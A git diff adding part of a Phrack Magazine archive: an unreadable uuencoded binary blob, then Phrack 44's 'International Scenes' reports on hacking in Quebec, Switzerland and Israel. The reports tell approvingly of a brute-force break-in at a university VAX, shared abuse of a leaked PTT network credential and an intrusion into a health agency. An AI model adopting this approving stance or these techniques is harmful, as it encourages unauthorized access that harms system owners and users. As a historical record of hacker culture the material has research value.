+M!B("Z[I06=CT4EZ^10E8%5?"+W>)G[=C[.HR)N;SJZ3S@G9#=Q"]A*CZ4:FL
+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
+(4U=[O!,0 #LY
+ 
+end
diff --git a/phrack44/26.txt b/phrack44/26.txt
new file mode 100644
index 0000000..c6d0402
--- /dev/null
+++ b/phrack44/26.txt
@@ -0,0 +1,450 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 26 of 27
+
+****************************************************************************
+
+                             International Scenes
+
+There was once a time when hackers were basically isolated.  It was
+almost unheard of to run into hackers from countries other than the
+United States.  Then in the mid 1980's thanks largely to the
+existence of chat systems accessible through X.25 networks like
+Altger, tchh and QSD, hackers world-wide began to run into each other.
+They began to talk, trade information, and learn from each other.
+Separate and diverse subcultures began to merge into one collective
+scene and has brought us the hacking subculture we know today.  A
+subculture that knows no borders, one whose denizens share the common goal
+of liberating information from its corporate shackles.
+
+With the incredible proliferation of the Internet around the globe, this
+group is growing by leaps and bounds.  With this in mind, we want to help
+further unite the communities in various countries by shedding light
+onto the hacking scenes that exist there.  We have been requesting files
+from people to describe the hacking scene in their country, but
+unfortunately, more people volunteered than followed through (you know
+who you are.)  This issue we want to introduce you to the scenes in
+Quebec, Sweden and Israel.
+
+*******************************************************************************
+
+                  What is going on in the 418 scene
+                      By Gurney Halleck of NPC
+
+
+        Believe it or not, there are hackers and phreakers in the 418 AC and
+people are just starting to hear from us.  There are only two real H/P BBS in
+Quebec City, The Workshop and Miranda BBS.  The first one is a NPC hang out
+(Northern Phun Co.), a local Hacker/Phreaker group that has a certain fame,
+just read Phone Pirates, a recent book by two Toronto journalists....
+The other one is considered a little bit lame by some.  Personally, I am
+friends with the sysops, they're not real hackers, but generally nice guys.
+
+        Here are some names you might have seen in the H/P scene, Blizkreig,
+SubHuman Punisher, KERMIT, Atreid Bevatron, Coaxial Karma, Mental Floss,
+Fairy Dust, Evil-E, Black Head, Santa Claus, Blue Angel Dream, myself of course
+and probably many more I have forgotten to mention.  (sorry)
+
+        NPC Publishes a monthly magazine and will be celebrating their first
+anniversary on November 1st 1993.  They have been on national TV and press for
+breaking into the computer of the prime minister's cabinet.
+
+        In 418, there is only one Internet Node, at Laval University, and to
+get a legal account on one of their systems, be ready to shell out 90$ a month.
+No kid can pay that much, so that's why there are so many hackers.  They hack
+anything from old VAX/VMS machines to brand new Suns and Datapac and Edupac.
+
+        Back in April of 1993, a hacker, Coaxial Karma, was arrested for trying
+to "brute force" into saphir.ulaval.ca, a cluster VAX/VMS.  He was working from
+information from another hacker, myself, that there were many "virgin" accounts
+(account that were issued but never used) and that these accounts all had a
+four letter (just letters) password.  So he proceeded to brute force the
+computer, after 72000 tries, he finally got in.  An operator, entirely by
+chance, found the logs for the 72000 failed logins for one account on saphir,
+an proceeded to call the police.  The hacker, being a juvenile, got by easily,
+not even loosing his computer.
+
+        On September 30th, another hacker, SubHuman Punisher, was arrested
+by the RCMP.  It all started a long time ago, when people started hacking
+into Laval University's systems.   First, they installed a password on their
+terminal servers, just one password, the same for everybody!  Needless to say,
+everybody knew it.  Second, most sys-admins knew next to nothing about
+security, so when they found intruders, they could not keep them out.
+Enter Jocelyn Picard, sysadmin of the GEL subdomain and security expert.
+He does his job and does it well.  He kicked them out for a long time.
+(I personally do not think it was his idea to call the RCMP.)
+
+        After a while, the hackers where back with a vengeance and using
+Laval's systems to hack other systems.  So the guys from the CTI (Centre
+de Traitement de l'Information) decided to call the authorities.  Bell
+monitored the phone lines from Sept 16th to Sept 30th.  Systems in the ERE
+hierarchy in the umontreal.ca domain were also logged for Internet activity.
+On the 30th, 2 hackers where arrested.  Both of them, their only crime
+was wanting to be on the internet.  Now is that so bad?
+
+        I only knew one of the two, SubHuman Punisher, so I'll tell you what
+happened to him.  He was charged with theft of telecomunications (that charge
+has been dropped) and for illegally using a computer.  A new charge as been
+added after they drop the first one: copyright infringement.  All his
+equipment was taken away.  We don't think he'll get by as easily as the first
+electronic martyr of 418 (as we like to call him).  This time it looks serious.
+So we at NPC have started a relief fund for his legal defense, The "Fond de
+Defense SubHuman Punisher" ( the SubHuman Punisher defense fund).
+
+All contributions are welcomed, write to:
+
+        FDSP
+        886 St-Vallier St. app 7
+        Quebec City, Qc
+        Canada, G1K 3R4
+
+*******************************************************************************
+
+                              The Swiss Scene
+                                  by Holz
+
+
+Welcome to Switzerland, the country that's famous for, ehmm err, well now
+famous for... come to think of it....nothing really.
+
+Well, for those of you that didn't pay much attention at high school:
+Switzerland is a rather unimportant country (to anyone but the Swiss) in
+the middle of Europe with about 7*10^6 inhabitants and some light industry.
+
+Networks in Switzerland
+-----------------------
+Switzerland has two internet providers, SWITCH and CHUUG. Lets deal with them
+in that order. SWITCH was originally formed from a consortium of the 9 (?)
+or so universities in Switzerland. It's purpose was linking the universities
+in Switzerland and providing access to international networks for their
+researchers. SWITCH is linked to the nfsnet via CERN (the European center
+for nuclear research in Geneva) and INRIA in France. SWITCH's Customers
+are almost exclusively universities or large corporations, they don't cater
+much to individuals. Most of the Network operates at 2..10 Mb/sec, SWITCH uses
+cisco hardware.
+
+The other provider, CHUUG, founded by Simon Poole does cater to individuals
+(they offer some for of pub access unix, + slip + uucp/news/mail feed), their
+links, which last time I looked went via Germany and Holland are somewhat
+slower. CHUUG also links some smaller companies (improware for instance)
+Apart from the Swiss Internet, there is a DECNET based Network called CHADNET,
+managed by SWITCH which also links the Swiss universities. There is even a
+gateway to HEPNET and SPAN at the Paul Schaerrer Institute (PSI) in Zuerich.
+Due to the restrictions in DECNET you need to use poor man's routing to get
+anywhere.
+
+Some of the universities have non ip internal networks, the most notable
+being KOMETH, which links the university of Zuerich and the ETHZ, most
+universities however just use their ethernets and don't have any fancy hardware.
+Apart from this Switzerland has it's own PDN, Telepac, operated by the Swiss
+Ptt (our federal telecommunications agency) with dnic 2284. This network
+is accessible at speeds of up to 9600 bps at a fixed charge all over the
+country. Apart from Telepac their are several other x25 based networks
+directly accessible from Switzerland, notable Sprintnet, with dialins in
+Zuerich and Bern, Tymnet with Dialins in Zuerich and Neuchatel, and Infonet.
+Last but not least Switzerland has a national vtx system (which i've never
+used, and i'm proud of that) called Videotext, which is linked to BTX in
+Germany, Prestel in England and Minitel in France. The only reason for using
+was the fact that up till recently it could be accessed for free via our
+equivalent of the 1-800 number (ours start with 155). The ptt now claims that
+this was a "mistake" (some mistake considering it lasted for two years and
+was used by everyone and his dog.....but I digress.)
+
+Hacking in Switzerland
+----------------------
+Well there's not much of a scene here. I have known a few (5-10) Swiss hackers
+and one or two good ones, but that doesn't go very far. As for boards, I can't
+think of any right now. BGB (with nua 0208046451064) used to have a hacker
+corner, but that's been closed for some years now I think. Pegasus
+(022847521257) which runs on a vax under vms is quite a nice system, where on
+occasion you meet people with an interest in vms.
+
+I don't know of any conventions in Switzerland, we've tried to organize one
+once (we ended up with three people). Hacking incidentally is illegal in
+Switzerland, but only as of this year.
+
+Phreaking in Switzerland
+------------------------
+I don't know much about Phreaking (anything ?). The Swiss telephone system
+is a very modern one, and nearly identical to the one in Sweden. This means
+that any of the old methods suitable for older exchanges (most notable blue
+boxing) don't work. There are some limited possibilities via our 1-800
+system, but Switzerland phone systems aren't easily abused. The switches
+incidentally are Siemens AX-10 (does that meen anything to anybody ?)
+I know of one or two good phreaks (rather than card abusers) in Switzerland.
+Phreaking and any messing with telephones, unlike hacking, has always been
+illegal in Switzerland.
+
+Some Incidents
+--------------
+Well here's for old times sake. (doubt this can do any harm any more)
+
+1)
+I've already mentioned the Swiss X.25 Network Telepac. To use this you need
+a nui, which is usually an 8 character string, and a password, which is six
+characters, mixed upper and lower case + usually numbers. Well obviously
+the ptt has nuis for internal use, as in this case the one for the employees
+of the ptt headquarters in Bern. The nui it seems was available to all the
+employees needing access and someone let the secret get out... so for two
+years every hacker in Switzerland used this nui to make x25 calls round the
+world. In fact it became so popular that the German hackers near the border
+found it worth their while to pay the ld charges to Switzerland just so they
+could use this nui. Eventually someone noticed. The cost must have been
+phenomenal.
+
+2)
+An acquaintance got into the Vax cluster of BAG (our equivalent to NIH).
+The people at BAG eventually noticed and kicked him out. In their press
+release to the incident, while being forced to admit that someone had got
+in they made a firm point of how 'secure' they were, and explained that it
+was impossible that anyone had seen any personal data on People registered
+as HIV positive. Well this was such an obvious cover-up that my acquaintance
+decided to give them a piece of his mind, so he called the national radio,
+and gave them an interview live on his motives and accomplishments.
+BAG continued to deny his version (but changed all their passwords.)
+
+*******************************************************************************
+
+                           The Israeli Scene
+
+                                   by
+
+                               Herd Beast
+
+
+      Didn't you always want to know about the "scene" in Israel?
+                                 YOU WILL...
+
+A SMALL OVERVIEW
+****************
+
+This article was written after I read Phracks 42/43, and the idea seemed
+good.  I am not affiliated with any person or any group mentioned
+in this file.
+
+It's hard to describe the "Israeli scene", so I will start with a short
+description of the state of technology in Israel.
+
+TECHNOLOGY
+**********
+
+The Israeli telephone system isn't very advanced.  Most of the country
+still doesn't even have tone dialing, and while the phone company has
+rAd plans about installing CLID and a pack full of other exciting things,
+the fact remains that half the country breathes rotary phones and analog
+lines.  Pathetic as it seems, it still means that tracing someone through
+the phone lines can be rather hard; it also means that K0D3 scanning is
+abundant.
+
+After the telephones comes the X.25 connection, Isranet: DNIC 4251.
+Isranet used to be a "hassle free system", eg every 11 year old could
+get a NUI and use it, and NUIs lasted.  Those merry times in which
+practically everyone who had a modem was an X.25 "hacker" are almost
+over.  The weakness of Isranet (the telco's fault!) is why if you happened
+upon QSD some years ago, you would have probably noticed that after Italian
+lesbians, Israelis lurked there the most.  Recently, Isranet switched
+systems.  The old system that just prompted NUI? and ADD? is gone, and
+in came the SprintNet (Telenet) system.  It is now generally believed
+that Isranet is un-crackable.  Way to go, Sprint, ahem.
+
+Amongst other thing the Israeli phone company supplies besides an X.25
+network is an information service (like 411) through modem, e-mail/FAX
+and database systems (a branch of AT&T EasyLink) and a bunch of other things.
+Not to forget the usual "alien" connections, like a TYMUSA connection
+(with very low access levels), and toll free numbers to the AT&T USA*Direct
+service and sexy-sounding MCI & Sprint operators.
+
+To my knowledge, cellular telephony among phreaks in Israel is virtually
+non existent, (that is to say, when talking to phreaks, none of them seems
+to care about cellular phones at all, for different reasons one of them
+being the starting price which is high), which is a pity but is also a
+blessing since security is lax and besides, the Israeli cell phone market
+is monopolized by Motorola (whose cell phones re known as "Pele Phones"
+which means "Wonder Phones").
+
+As you might have understood, up until lately, the Israeli phone company
+(Bezeq) wasn't very aware of security and boring stuff like that.  Now
+it's becoming increasingly aware, although not quite enough.  The notion
+in Israel is that hackers are like computer geniuses who can get into
+ANYWHERE, and when last did you see someone like that?  So basically,
+corporate security is lax (does "unpassworded superuser account" ring a
